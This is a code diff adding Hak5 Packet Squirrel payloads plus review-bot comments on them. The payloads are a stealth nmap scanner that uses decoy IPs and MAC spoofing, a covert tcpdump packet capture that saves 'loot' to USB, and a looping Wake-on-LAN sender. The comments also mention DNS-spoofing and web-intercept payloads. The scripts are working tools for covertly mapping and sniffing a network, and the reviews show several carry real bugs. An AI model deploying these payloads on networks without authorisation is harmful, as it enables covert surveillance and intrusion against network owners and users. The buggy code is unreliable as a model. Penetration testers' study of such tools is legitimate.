@@ -0,0 +1,276 @@ +#!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# +# Title: NMap Dump +# Description: Dumps NMap scan data to USB storage. +# Author: infoskirmish.com +# Version: 2.0 +# Category: sniffing +# Target: Any +# Net Mode: TRANSPARENT + +# Updated to the Packet Squirrel Mark II by Hak5 + +# LEDs +# SUCCESS: Scan complete +# FAIL: No USB storage found +# SCANNING: Rapid White + +#### Constants #### + +# If you know which interface will allow outbound traffic you can specify it here +# leaving it blank will enable the payload trying to attempt to figure out which +# interface to use. +defaultInterface="lo" + + +# Number of decoy IPs to spawn +rndDecoyNumber=5 + +# Spoof the MAC of this device type +spoofDevType="Cisco" + +# Seconds to sleep while loading NAT +netSleep=10 + +# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE +# BRIDGE mode will preserve the Squirrel IP +mode="BRIDGE" + +# When done what should we do? reboot | halt | nothing | poweroff +onEnd="halt" + +# Path to store results +lootPath="/usb/loot/nmapdump" + +# File name scheme +lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)" + +# Clear the log every run? +clearLogs=true + +#### Payload Code #### + +function finish() { + + # Sync filesystem + sync + + # Indicate successful shutdown + LED B SUCCESS + sleep 1 + + # Halt the system + LED OFF + + case "$onEnd" in + "poweroff") poweroff ;; + "reboot") reboot ;; + "halt") halt ;; + "nothing") echo "see ya!" >> $lootPath/log.txt ;; + *) reboot;; + esac + +} + +function run() { + + # Create loot directory + mkdir -p $lootPath &> /dev/null + + # Clear the logs + if [ "${clearLogs}x" == "truex" ]; then + echo > ${lootPath}/log.txt + fi + + # Set networking mode to user preferance and sleep to allow time to sync up. + # If set to NONE this will not be set and thus not kick you out of your SSH session. 
+ if [ "$mode" != "NONE" ]; then + + NETMODE $mode + sleep $netSleep + + fi + + # Log ifconfig data; helpful for troubleshooting + ifconfig >> $lootPath/log.txt + + # Starting scanning LED (rapid white blink) + LED W VERYFAST + + # Run nmap scan with options + + # Now lets figure out which interface to use. + iface=$(ip -o link show | awk '{print $2}') + + # Set ipv6 default to null + ipv6="" + + # Now lets look at the ip addresses assigned to the various interfaces. + while IFS= read -r line; do + + # Standardize interface name + line="${line//:}" + + # We can skip lo + if [ "$line" != "lo" ]; then + + # Get IP Address for Interface. + ifip=$(ifconfig $line 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://') + + # Make sure result is not null. + if [ "$ifip" ]; then + + # Store for later use the ip addresses associted with interface. + # We don't want an empty 1st line. + if [ "$ipaddresses" ]; then + ipaddresses+=$'\n'$ifip + else + ipaddresses=$ifip + fi + + # If user has specified a default interface than we can disregard. + if [ ! "$defaultInterface" ]; then + + # Store the interface for later use. + # We don't want an empty 1st line. + if [ "$interfaces" ]; then + interfaces+=$'\n'$line + else + interfaces=$line + fi + fi + + # convert ip to subnet + newSubNet=`echo $ifip | cut -d"." -f1-3` + newSubNet=$newSubNet".1/24" + + # Add subnet to list + # We don't want a leading empty character. + if [ "$newSubNet" ]; then + targets+=" $newSubNet" + else + targets=$newSubNet + fi + + fi + + fi # end our test for lo + + done <<< "$iface" # loop to gather IP addresses + + # Clean up subnets to remove accidental double spaces. + echo "$targets" | awk '$1=$1' &> /dev/null + + # if targets is empty we have no subnets. Let's check if we can find IPv6 + if [ ! "$targets" ]; then + + # Collect all uniqu IPv6 address that we can ping. + ipv6=$(ping -6 ff02::1 -w 10 2>/dev/null | awk '/from/ {print $4}' | cut -d":" -f1-6 | sort | uniq | tr "\r\n" " ") + if [ ! 
"$ipv6" ]; then + + # We could not find any ipv4 address and ipv6 returned nothing. + echo "Could not accquire any IP addresses to scan." >> $lootPath/log.txt + sync + LED OFF + exit 1 + fi + fi + + # Add lo as some setups the loopback maybe the interface to send out traffic + # If user supplies default interface tie in their selection and disregard the + # auto locate data. + if [ ! "$defaultInterface" ]; then + interfaces+=$'\nlo' + else + interfaces=$defaultInterface + fi + + # log subnets and ip addresses we found + echo "Subnets to scan $targets" >> $lootPath/log.txt + echo "IPs to scan $ipaddresses" >> $lootPath/log.txt + + # Document the fact we will be scanning ipv6 + if [ "$ipv6" ]; then + echo "We will be scanning ipv6 addresses" >> $lootPath/log.txt + fi + + # Now lets find the interface that will allow outbound traffic on the LAN. + while IFS= read -r interface; do + + # We will use the ip addresses we found to see if this interface can ping it. + while IFS= read -r ip; do + + # If we can send ping packets then the interface is likley able to work with nmap + # Determin if we should ping in ipv4 or ipv6 + if [ ! "$ipv6" ]; then + + if [[ ! $(ping -I $interface $ip -w 3 | grep '0 packets received') ]]; then + + # Make sure wee don't end up with a blank first line. + if [ "$goodInterface" ]; then + + goodInterfaces+=$'\n'$interface + else + goodInterfaces=$interface + fi + fi + + else + + if [[ ! $(ping -6 ff02::1 -w 3 | grep '0 packets received') ]]; then + + # Make sure wee don't end up with a blank first line. + if [ "$goodInterface" ]; then + + goodInterfaces+=$'\n'$interface + else + goodInterfaces=$interface + fi + fi + + fi + + done <<< "$ipaddresses" # end loop to find interfaces we can use + + done <<< "$interfaces" # end loop to scan interfaces + + # Log interfaces we can use + echo "Interfaces allowing outbound traffic: $goodInterfaces" >> $lootPath/log.txt + + # Make sure we have interfaces that will allow outbound traffic. 
+ if [ "$goodInterfaces" ]; then + while IFS= read -r goodInterface; do + + # Finally! Lets run NMap! + # Use ipv4 + if [ ! "$ipv6" ]; then + nmap -Pn -e $goodInterface -sS -F -sV -oA $lootPath/$lootFileNameScheme -D RND:$rndDecoyNumber --randomize-hosts --spoof-mac $spoofDevType $targets >> $lootPath/log.txt + else + # Use ipv6 + nmap -Pn -e $goodInterface -sT -F -R -oA $lootPath/$lootFileNameScheme --randomize-hosts --spoof-mac $spoofDevType -6 $ipv6 >> $lootPath/log.txt + fi + + done <<< "$goodInterfaces" + + else + echo "Could not find any interfaces that will allow outbound traffic." >> $lootPath/log.txt + exit 1 + fi + + + # Done scanning; clean up. + finish + +} # end run() function + +USB_WAIT + +# Show attack LED +LED ATTACK + +# ATTACK!!!! +run + diff --git a/payloads/remote-access/wake_on_lan/README.md b/payloads/remote-access/wake_on_lan/README.md new file mode 100644 index 0000000..2125eae --- /dev/null +++ b/payloads/remote-access/wake_on_lan/README.md @@ -0,0 +1,7 @@ +# Wake-on-LAN + +This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the +payload configuration. + +Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on +the Packet Squirrel! diff --git a/payloads/remote-access/wake_on_lan/payload b/payloads/remote-access/wake_on_lan/payload new file mode 100755 index 0000000..c91aaf0 --- /dev/null +++ b/payloads/remote-access/wake_on_lan/payload 
@@ -0,0 +1,37 @@ +#!/bin/bash + +# Title: Wake on Lan +# Description: Wake On Lan with Python +# Author: Hak5 + +# Configuration + +# MAC addresses, separated by spaces +WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF" + +# How often do we wake up systems, in seconds? +WOL_INTERVAL=30 + + + + +# NAT mode +NETMODE NAT + +# Set the LED +LED G SINGLE + +while true; do + # Toggle the LED, send the WoL + LED W SOLID + python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS} + + # Wait one second for the LED to be visible + sleep 1 + + # Reset the LED + LED G SINGLE + + # Wait the wakeup interval + sleep ${WOL_INTERVAL} +done diff --git a/payloads/remote-access/wake_on_lan/python_wol.py b/payloads/remote-access/wake_on_lan/python_wol.py new file mode 100755 index 0000000..a00fe4d --- /dev/null +++ b/payloads/remote-access/wake_on_lan/python_wol.py @@ -0,0 +1,21 @@ +#!/usr/bin/python + +import sys +import socket + +# Simplified function to send a wake-on-lan packet +def send_wol(destination): + sync = "FF" * 6 + macs = destination * 16 + payload = bytes.fromhex(sync + macs) + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) + sock.sendto(payload, ("255.255.255.255", 9)) + +# Send a WoL packet for each MAC address we +# were called with +for mac in sys.argv[1:]: + fin_mac = mac.replace(":", "") + send_wol(fin_mac) + diff --git a/payloads/sniffing/tcpdump/payload b/payloads/sniffing/tcpdump/payload new file mode 100755 index 0000000..8992553 --- /dev/null +++ b/payloads/sniffing/tcpdump/payload 
@@ -0,0 +1,72 @@ +#!/bin/bash +# +# Title: TCPDump +# Description: Dumps networking-data to USB storage. Completes on button-press or storage full. +# Author: Hak5 +# Version: 1.0 +# Category: sniffing +# Target: Any +# Net Mode: TRANSPARENT + +# LEDs +# SUCCESS: Dump complete +# FAIL: No USB storage found + +function monitor_space() { + while true + do + [[ $(USB_FREE) -lt 10000 ]] && { + kill $1 + LED G SUCCESS + sync + break + } + sleep 5 + done +} + +function finish() { + # Kill TCPDump and sync filesystem + kill $1 + wait $1 + sync + + # Indicate successful shutdown + LED R SUCCESS + sleep 1 + + # Halt the system + LED OFF + halt +} + +function run() { + # Create loot directory + mkdir -p /usb/loot/tcpdump &> /dev/null + + # Set networking to TRANSPARENT mode and wait five seconds + NETMODE TRANSPARENT + sleep 5 + + LED ATTACK + + # Start tcpdump on the bridge interface + tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null & + tpid=$! + + # Wait for button to be pressed (disable button LED) + NO_LED=true BUTTON + finish $tpid +} + + +# This payload will only run if we have USB storage + +# Wait for the USB drive +USB_WAIT + +LED ATTACK +run & +monitor_space $! & + +wait
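Review bot: In the PCL Printer Capture payload, `mkdir /usb/printer/` is called without `-p`, so every run after the first prints an error because the directory already exists. Use `mkdir -p /usb/printer/`, matching the `mkdir -p` the tcpdump payload uses for its loot directory. The header comment also refers to `captured-file.stream`, while `DYNAMICPROXY` is given the prefix `/usb/printer/print_`; a line stating how the saved files are actually named would make the GhostPCL instructions easier to follow.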
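Review bot: In `payloads/general/gatekeeper/payload`, the test `[ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]` leaves the command substitution unquoted, so if `/tmp/squirrel_netmode` is missing or empty the expression collapses to `[ == "BRIDGE" ]`, the test errors, and the script always takes the else branch and never switches to `NETMODE JAIL`. Quote it, for example `[ "$(cat /tmp/squirrel_netmode 2>/dev/null)" = "${NETWORK_MODE}" ]`. The comment above it also reads inverted ("if we're not the right mode, send the target device to jail") when the branch fires if the current mode equals `NETWORK_MODE`, and "buttom" in the loop comment should be "button".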
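Review bot: In `payloads/interception/dns_sinkhole/payload`, the header comment describes the match as `*.hak5.org` but the `SPOOFDNS` arguments are written `.*.hak5.org`, and nothing in the file says which pattern syntax applies. If these are regular expressions, the unescaped dots match any character, so the patterns cover more names than the comment promises; if they are globs, the leading `.` is unexpected. Please document the syntax in the comment and, if it is regex, escape the literal dots.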
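Review bot: In `payloads/interception/web_intercept/payload`, the response built by `echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n"` ends its header lines with bare `\n` and sends neither `Content-Length` nor `Connection: close`. HTTP/1.1 header lines are terminated by CRLF, and without a length or close indication a client cannot tell where the image ends until netcat drops the connection. Suggest `\r\n` line endings plus a `Connection: close` header. Also worth a comment: the `webpayload` nftables table and its redirect rule are never removed, so the port 80 redirect outlives the loop if the payload is stopped.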
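Review bot: `payloads/recon/nmapdump/README.md` disagrees with the `payload.sh` added in the same change in three places: the README says `Net Mode: NAT` while the script header says `Net Mode: TRANSPARENT` and the code sets `mode="BRIDGE"`; the README gives the default interface as eth0 while the script sets `defaultInterface="lo"`; and the README gives the default path as `/mnt/loot/nmapdump` while the script uses `lootPath="/usb/loot/nmapdump"`. Please align the README with the script's actual defaults. "maybe changed" should read "may be changed".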
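Review bot: In `payloads/recon/nmapdump/payload.sh`, both ping branches test `if [ "$goodInterface" ]` (singular) before appending to `goodInterfaces`, but `goodInterface` is not assigned until the later `while IFS= read -r goodInterface` loop, so the else branch always runs and `goodInterfaces=$interface` overwrites the list, keeping only the last interface that answered. The test should be on `$goodInterfaces`. The same pattern appears with `if [ "$newSubNet" ]` guarding `targets+=`, where the intended check is on `$targets`, and `echo "$targets" | awk '$1=$1' &> /dev/null` discards its output, so the "clean up" step changes nothing. The file header is also contradictory: it says the payload "is for the original Packet Squirrel" and "may not work on the Packet Squirrel Mark II", then says "Updated to the Packet Squirrel Mark II by Hak5"; one of the two statements should go.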
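Review bot: `payloads/remote-access/wake_on_lan/README.md` tells users to copy `wol_python.py`, but the file added in this change and the path the payload runs are both `python_wol.py`. Anyone following the README literally will look for a file that does not exist; the README should name `python_wol.py`.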
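Review bot: In `payloads/remote-access/wake_on_lan/python_wol.py`, the MAC arguments are passed to `bytes.fromhex` after only `mac.replace(":", "")`, with no check on length or characters. A target written with `-` separators or a typo raises `ValueError` and stops the loop before the remaining MACs are sent, and a string of the wrong length that happens to be valid hex silently produces a malformed magic packet. Suggest validating that each cleaned MAC is exactly 12 hex digits and skipping bad entries with a message. The socket is also never closed, and since `bytes.fromhex` requires Python 3, a comment saying so next to the `#!/usr/bin/python` shebang would help.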
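Review bot: In `payloads/sniffing/tcpdump/payload`, the last lines `run &` followed by `monitor_space $! &` hand `monitor_space` the PID of the backgrounded `run` job, not of tcpdump (that PID lives in `tpid` inside `run`). When free space drops below the threshold, `kill $1` therefore signals the `run` subshell rather than tcpdump itself, so the capture is not stopped cleanly, `finish` is never reached, and the `sync` happens while tcpdump may still be writing. Start `monitor_space` from inside `run` with `$tpid`, or have `run` publish the tcpdump PID. The header lists `FAIL: No USB storage found`, but no failure LED is ever set in the script; either add it or drop the line.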